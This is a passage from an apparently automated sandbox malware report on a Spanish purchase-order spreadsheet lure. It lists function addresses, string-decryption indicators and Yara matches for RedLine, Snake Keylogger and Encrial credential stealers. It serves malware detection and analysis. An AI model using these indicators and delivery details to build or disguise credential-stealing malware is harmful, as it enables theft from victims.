Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D1560	9_2_003D1560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D1551	9_2_003D1551
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D12B0	9_2_003D12B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D12C0	9_2_003D12C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A828F0	9_2_00A828F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82020	9_2_00A82020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8741A	9_2_00A8741A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A86858	9_2_00A86858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8BDE1	9_2_00A8BDE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A81D30	9_2_00A81D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A84AB8	9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8828A	9_2_00A8828A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A856D8	9_2_00A856D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82600	9_2_00A82600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A81A40	9_2_00A81A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A83FE0	9_2_00A83FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82BE0	9_2_00A82BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8B720	9_2_00A8B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82310	9_2_00A82310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A80F48	9_2_00A80F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A828E4	9_2_00A828E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82010	9_2_00A82010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A825F1	9_2_00A825F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A81D20	9_2_00A81D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8F6D1	9_2_00A8F6D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8EE21	9_2_00A8EE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8F279	9_2_00A8F279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A85FA4	9_2_00A85FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8AF89	9_2_00A8AF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8AF98	9_2_00A8AF98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A863F8	9_2_00A863F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82BD0	9_2_00A82BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A83FD4	9_2_00A83FD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8FB29	9_2_00A8FB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A80F39	9_2_00A80F39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82300	9_2_00A82300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8B71F	9_2_00A8B71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A85B47	9_2_00A85B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E6E0	9_2_00D2E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C6E8	9_2_00D2C6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C080	9_2_00D2C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2D3A8	9_2_00D2D3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2F3A8	9_2_00D2F3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2CD48	9_2_00D2CD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ED48	9_2_00D2ED48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E078	9_2_00D2E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2DA10	9_2_00D2DA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D24A18	9_2_00D24A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D265D0	9_2_00D265D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E6D0	9_2_00D2E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ABD8	9_2_00D2ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C6D8	9_2_00D2C6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D245C0	9_2_00D245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D272C8	9_2_00D272C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D208F0	9_2_00D208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D288F0	9_2_00D288F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D215F7	9_2_00D215F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D215F8	9_2_00D215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D222FF	9_2_00D222FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D29EE0	9_2_00D29EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ABE8	9_2_00D2ABE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2A790	9_2_00D2A790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B497	9_2_00D2B497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2D39A	9_2_00D2D39A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D20498	9_2_00D20498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B498	9_2_00D2B498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2F398	9_2_00D2F398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2119F	9_2_00D2119F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D25888	9_2_00D25888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22BB0	9_2_00D22BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D291B0	9_2_00D291B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D238B7	9_2_00D238B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D238B8	9_2_00D238B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D245BF	9_2_00D245BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D211A0	9_2_00D211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21EA7	9_2_00D21EA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21EA8	9_2_00D21EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D284A8	9_2_00D284A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22BAF	9_2_00D22BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21A50	9_2_00D21A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22757	9_2_00D22757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22758	9_2_00D22758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D26258	9_2_00D26258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D28D58	9_2_00D28D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2345F	9_2_00D2345F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D20040	9_2_00D20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B040	9_2_00D2B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2624A	9_2_00D2624A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D20D48	9_2_00D20D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21A4F	9_2_00D21A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C076	9_2_00D2C076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D25878	9_2_00D25878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23460	9_2_00D23460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D29A60	9_2_00D29A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D24167	9_2_00D24167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D24168	9_2_00D24168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E068	9_2_00D2E068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23D10	9_2_00D23D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22300	9_2_00D22300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D28900	9_2_00D28900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2DA00	9_2_00D2DA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23007	9_2_00D23007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23008	9_2_00D23008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D29608	9_2_00D29608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23D0F	9_2_00D23D0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B031	9_2_00D2B031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2A338	9_2_00D2A338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2CD38	9_2_00D2CD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ED38	9_2_00D2ED38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D28028	9_2_00D28028
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01338060	11_2_01338060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A2046	11_2_013A2046
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01398298	11_2_01398298
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136E4FF	11_2_0136E4FF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136676B	11_2_0136676B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013C4873	11_2_013C4873
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0135CAA0	11_2_0135CAA0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0133CAF0	11_2_0133CAF0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01366DD9	11_2_01366DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134CC39	11_2_0134CC39
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134B119	11_2_0134B119
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013391C0	11_2_013391C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351394	11_2_01351394
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134120B	11_2_0134120B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351706	11_2_01351706
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01337920	11_2_01337920
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134997D	11_2_0134997D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013519B0	11_2_013519B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0135781B	11_2_0135781B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01357A4A	11_2_01357A4A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351C77	11_2_01351C77
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01357CA7	11_2_01357CA7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351F32	11_2_01351F32
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013BBE44	11_2_013BBE44
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01369EEE	11_2_01369EEE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_005536F0	11_2_005536F0

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Orden de compra 0001-00255454.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01010A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01339CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 0100F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01350A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 00FF9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 0134F9F2 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: String function: 029DC3A0 appears 34 times
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: String function: 029EFE30 appears 46 times

Yara signature match

Source: sheet1.xml, type: SAMPLE	Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
